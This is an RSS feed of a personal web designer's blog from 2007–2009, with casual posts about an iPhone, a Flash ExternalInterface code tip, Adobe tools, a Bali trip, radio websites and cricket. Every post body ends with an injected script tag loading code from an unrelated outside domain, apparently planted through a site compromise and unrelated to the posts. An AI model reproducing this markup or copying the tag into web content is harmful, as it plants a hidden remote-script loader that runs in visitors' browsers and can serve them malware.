<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>t-roy.net* &#187; General Rantings</title>
	<atom:link href="http://www.t-roy.net/category/general-rants/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.t-roy.net</link>
	<description>blog by designer troy ginbey</description>
	<lastBuildDate>Sat, 13 Jun 2009 14:05:33 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>iPhones make you a better person.</title>
		<link>http://www.t-roy.net/2008/08/30/iphones-make-you-a-better-person/</link>
		<comments>http://www.t-roy.net/2008/08/30/iphones-make-you-a-better-person/#comments</comments>
		<pubDate>Sat, 30 Aug 2008 08:27:36 +0000</pubDate>
		<dc:creator>T-roy</dc:creator>
				<category><![CDATA[General Rantings]]></category>

		<guid isPermaLink="false">http://www.t-roy.net/?p=24</guid>
		<description><![CDATA[Yep&#8230; They make you smarter, more interesting, and give you those good looking friends you see on commercials. I literally haven&#8217;t put it down since I walked out of the shop with it yesterday&#8230; Sorry Sarah! :)
]]></description>
			<content:encoded><![CDATA[<p>Yep&#8230; They make you smarter, more interesting, and give you those good looking friends you see on commercials. I literally haven&#8217;t put it down since I walked out of the shop with it yesterday&#8230; Sorry Sarah! :)<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.t-roy.net/2008/08/30/iphones-make-you-a-better-person/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Calling an ActionScript function from Flash</title>
		<link>http://www.t-roy.net/2008/07/16/calling-an-actionscript-function-from-flash/</link>
		<comments>http://www.t-roy.net/2008/07/16/calling-an-actionscript-function-from-flash/#comments</comments>
		<pubDate>Wed, 16 Jul 2008 02:25:40 +0000</pubDate>
		<dc:creator>T-roy</dc:creator>
				<category><![CDATA[Adobe Flash]]></category>
		<category><![CDATA[General Rantings]]></category>

		<guid isPermaLink="false">http://www.t-roy.net/?p=23</guid>
		<description><![CDATA[This is pretty cool&#8230; being able to control your Flash movies from your HTML page through JavaScript.
To do this, you need to make use of Flash&#8217;s ExternalInterface (from Flash 8+)
Your flash code will look something like this:
import flash.external.ExternalInterface;
function stopVideoPlaying() {
  myVideo.stop();
}
ExternalInterface.addCallback("stopVideoPlaying", this, stopVideoPlaying);
The first line imports the External Interface. The next is three lines [...]]]></description>
			<content:encoded><![CDATA[<p>This is pretty cool&#8230; being able to control your Flash movies from your HTML page through JavaScript.</p>
<p>To do this, you need to make use of Flash&#8217;s ExternalInterface (from Flash 8+)</p>
<p>Your flash code will look something like this:</p>
<p><code>import flash.external.ExternalInterface;<br />
function stopVideoPlaying() {<br />
  myVideo.stop();<br />
}<br />
ExternalInterface.addCallback("stopVideoPlaying", this, stopVideoPlaying);</code></p>
<p>The first line imports the External Interface. The next is three lines is the function we want to call from our HTML page.</p>
<p>Finally, we add an addCallBack method, which, in order, defines the JavaScript function to listen for, the target, and the function to call when the callBack is received.</p>
<p>The JavaScript code will look like this:</p>
<p><code>window.onload = function() {<br />
  if(navigator.appName.indexOf("Microsoft") != -1) {<br />
    flash = window.swfVideo;<br />
  }else {<br />
    flash = window.document.swfVideo;<br />
  }<br />
}<br />
function stopFlashVideo() {<br />
  flash.stopVideoPlaying();<br />
}</code></p>
<p>Then, to call the Javascript method, just make sure your Flash is given an id name of swfVideo, then call the JavaScript function <strong>stopFlashVideo</strong>.<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.t-roy.net/2008/07/16/calling-an-actionscript-function-from-flash/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>c&#8217;mon&#8230; it&#8217;s only been 8 months</title>
		<link>http://www.t-roy.net/2008/03/21/cmon-its-only-been-8-months-2/</link>
		<comments>http://www.t-roy.net/2008/03/21/cmon-its-only-been-8-months-2/#comments</comments>
		<pubDate>Fri, 21 Mar 2008 01:08:14 +0000</pubDate>
		<dc:creator>T-roy</dc:creator>
				<category><![CDATA[General Rantings]]></category>

		<guid isPermaLink="false">http://www.t-roy.net/?p=13</guid>
		<description><![CDATA[Yes, I finally thought I should write something. Just for the sake of it. I&#8217;ve just started working on some new standards based designs, so I&#8217;ll start to post some new stuff soon!
Also I&#8217;m about to start bringing together an Adobe AIR project using Flex&#8230; so I&#8217;ll make sure I keep posting my progress :)

]]></description>
			<content:encoded><![CDATA[<p>Yes, I finally thought I should write something. Just for the sake of it. I&#8217;ve just started working on some new standards based designs, so I&#8217;ll start to post some new stuff soon!<br />
Also I&#8217;m about to start bringing together an Adobe AIR project using Flex&#8230; so I&#8217;ll make sure I keep posting my progress :)<br />
<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.t-roy.net/2008/03/21/cmon-its-only-been-8-months-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Adobe CS3 Video Workshops</title>
		<link>http://www.t-roy.net/2007/07/22/adobe-cs3-video-workshops/</link>
		<comments>http://www.t-roy.net/2007/07/22/adobe-cs3-video-workshops/#comments</comments>
		<pubDate>Sun, 22 Jul 2007 07:39:33 +0000</pubDate>
		<dc:creator>T-roy</dc:creator>
				<category><![CDATA[General Rantings]]></category>

		<guid isPermaLink="false">http://www.t-roy.net/?p=11</guid>
		<description><![CDATA[Just found a heap of videos on the Adobe site which are really useful to check out &#038; learn new features in any of the CS3 applications:
http://www.adobe.com/designcenter/video_workshop/
]]></description>
			<content:encoded><![CDATA[<p>Just found a heap of videos on the Adobe site which are really useful to check out &#038; learn new features in any of the CS3 applications:</p>
<p><a href="http://www.adobe.com/designcenter/video_workshop/">http://www.adobe.com/designcenter/video_workshop/</a><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.t-roy.net/2007/07/22/adobe-cs3-video-workshops/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Kuler Addict</title>
		<link>http://www.t-roy.net/2007/07/09/kuler-addict/</link>
		<comments>http://www.t-roy.net/2007/07/09/kuler-addict/#comments</comments>
		<pubDate>Sun, 08 Jul 2007 15:19:42 +0000</pubDate>
		<dc:creator>T-roy</dc:creator>
				<category><![CDATA[General Rantings]]></category>

		<guid isPermaLink="false">http://www.t-roy.net/?p=10</guid>
		<description><![CDATA[I found this the other day.. Kuler. Create different colour pallets with this Adobe AIR app, publish them &#038; let the public decide if you&#8217;re in the right profession!
My latest Kuler theme: Oranjeboom:
http://kuler.adobe.com/index.cfm#themeID/65129
You can even download themes as swatch sets for use in Photoshop&#8230;
]]></description>
			<content:encoded><![CDATA[<p>I found this the other day.. Kuler. Create different colour pallets with this Adobe AIR app, publish them &#038; let the public decide if you&#8217;re in the right profession!</p>
<p>My latest Kuler theme: Oranjeboom:<br />
<a href="http://kuler.adobe.com/index.cfm#themeID/65129" target="_blank">http://kuler.adobe.com/index.cfm#themeID/65129</a></p>
<p>You can even download themes as swatch sets for use in Photoshop&#8230;<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.t-roy.net/2007/07/09/kuler-addict/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>September = Ubud</title>
		<link>http://www.t-roy.net/2007/06/30/september-ubud/</link>
		<comments>http://www.t-roy.net/2007/06/30/september-ubud/#comments</comments>
		<pubDate>Sat, 30 Jun 2007 14:22:48 +0000</pubDate>
		<dc:creator>T-roy</dc:creator>
				<category><![CDATA[General Rantings]]></category>

		<guid isPermaLink="false">http://www.t-roy.net/?p=9</guid>
		<description><![CDATA[Ok &#8211; we&#8217;ve finally booked our trip in September! 8 nights in Indonesia&#8230; Staying in the arts centre of Bali &#8211; Ubud for the first part, then Seminyak.
Check it out here:
http://www.alilahotels.com/Ubud/
and here:
http://www.sofitelbali.com/english.php

]]></description>
			<content:encoded><![CDATA[<p>Ok &#8211; we&#8217;ve finally booked our trip in September! 8 nights in Indonesia&#8230; Staying in the arts centre of Bali &#8211; Ubud for the first part, then Seminyak.</p>
<p>Check it out here:<br />
<a href="http://www.alilahotels.com/Ubud/">http://www.alilahotels.com/Ubud/</a></p>
<p>and here:<br />
<a href="http://www.sofitelbali.com/english.php">http://www.sofitelbali.com/english.php</a></p>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.t-roy.net/2007/06/30/september-ubud/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New Nova Radio Websites</title>
		<link>http://www.t-roy.net/2007/06/10/new-nova-radio-websites/</link>
		<comments>http://www.t-roy.net/2007/06/10/new-nova-radio-websites/#comments</comments>
		<pubDate>Sun, 10 Jun 2007 05:58:09 +0000</pubDate>
		<dc:creator>T-roy</dc:creator>
				<category><![CDATA[General Rantings]]></category>

		<guid isPermaLink="false">http://www.t-roy.net/?p=8</guid>
		<description><![CDATA[We&#8217;ve just launched completely re-designed websites at Nova&#8230;
Sydney : Nova 96.9
Melbourne : Nova 100.3
Perth : Nova 93.7
Adelaide : Nova 91.9
Brisbane : Nova 106.9
Check them out &#038; let me know what you think :)
]]></description>
			<content:encoded><![CDATA[<p>We&#8217;ve just launched completely re-designed websites at Nova&#8230;</p>
<p><a href="http://www.nova969.com.au">Sydney : Nova 96.9</a><br />
<a href="http://www.nova100.com.au">Melbourne : Nova 100.3</a><br />
<a href="http://www.nova937.com.au">Perth : Nova 93.7</a><br />
<a href="http://www.nova919.com.au">Adelaide : Nova 91.9</a><br />
<a href="http://www.nova1069.com.au">Brisbane : Nova 106.9</a></p>
<p>Check them out &#038; let me know what you think :)<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.t-roy.net/2007/06/10/new-nova-radio-websites/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Summer Bowling&#8230; and genuine 1972 beer prices</title>
		<link>http://www.t-roy.net/2007/01/29/summer-bowling-and-genuine-1972-beer-prices/</link>
		<comments>http://www.t-roy.net/2007/01/29/summer-bowling-and-genuine-1972-beer-prices/#comments</comments>
		<pubDate>Sun, 28 Jan 2007 23:24:01 +0000</pubDate>
		<dc:creator>T-roy</dc:creator>
				<category><![CDATA[General Rantings]]></category>

		<guid isPermaLink="false">http://www.t-roy.net/?p=4</guid>
		<description><![CDATA[Checked out a new weekly event presented by the Funk Club and Fundamental Empire: Summer Bowling at the Mt Lawley Bowling Club from 2 to 8pm every Sunday. Featuring genuine 1972 beer prices, funky tunes, lawn bowls, bbq, ice cream &#038; more…. farking brilliant!

]]></description>
			<content:encoded><![CDATA[<p>Checked out a new weekly event presented by the Funk Club and Fundamental Empire: <strong>Summer Bowling</strong> at the Mt Lawley Bowling Club from 2 to 8pm every Sunday. Featuring genuine 1972 beer prices, funky tunes, lawn bowls, bbq, ice cream &#038; more…. farking brilliant!</p>
<p><a href="http://www.myspace.com/funkclubinc"></a><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.t-roy.net/2007/01/29/summer-bowling-and-genuine-1972-beer-prices/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>god created cricket</title>
		<link>http://www.t-roy.net/2007/01/28/god-created-cricket/</link>
		<comments>http://www.t-roy.net/2007/01/28/god-created-cricket/#comments</comments>
		<pubDate>Sun, 28 Jan 2007 05:24:31 +0000</pubDate>
		<dc:creator>T-roy</dc:creator>
				<category><![CDATA[General Rantings]]></category>

		<guid isPermaLink="false">http://www.t-roy.net/?p=3</guid>
		<description><![CDATA[Man I love summer&#8230; it&#8217;s 41 degrees&#8230; as it has been for the past 3 days straight&#8230; nothing to do but sit inside drink beer &#038; watch cricket&#8230;
You know it! faaaarkin hot&#8230;
]]></description>
			<content:encoded><![CDATA[<p>Man I love summer&#8230; it&#8217;s 41 degrees&#8230; as it has been for the past 3 days straight&#8230; nothing to do but sit inside drink beer &#038; watch cricket&#8230;</p>
<p>You know it! faaaarkin hot&#8230;<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.t-roy.net/2007/01/28/god-created-cricket/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>the great MySpace race&#8230;</title>
		<link>http://www.t-roy.net/2007/01/28/fuck-myspace/</link>
		<comments>http://www.t-roy.net/2007/01/28/fuck-myspace/#comments</comments>
		<pubDate>Sun, 28 Jan 2007 05:20:48 +0000</pubDate>
		<dc:creator>T-roy</dc:creator>
				<category><![CDATA[General Rantings]]></category>

		<guid isPermaLink="false">http://www.t-roy.net/?p=2</guid>
		<description><![CDATA[MySpace&#8230; mmmm no. It looks like web from the 80&#8217;s&#8230; move on kids (and you Brad ya loser&#8230;) hehe
]]></description>
			<content:encoded><![CDATA[<p>MySpace&#8230; mmmm no. It looks like web from the 80&#8217;s&#8230; move on kids (and you Brad ya loser&#8230;) hehe<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.t-roy.net/2007/01/28/fuck-myspace/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
   

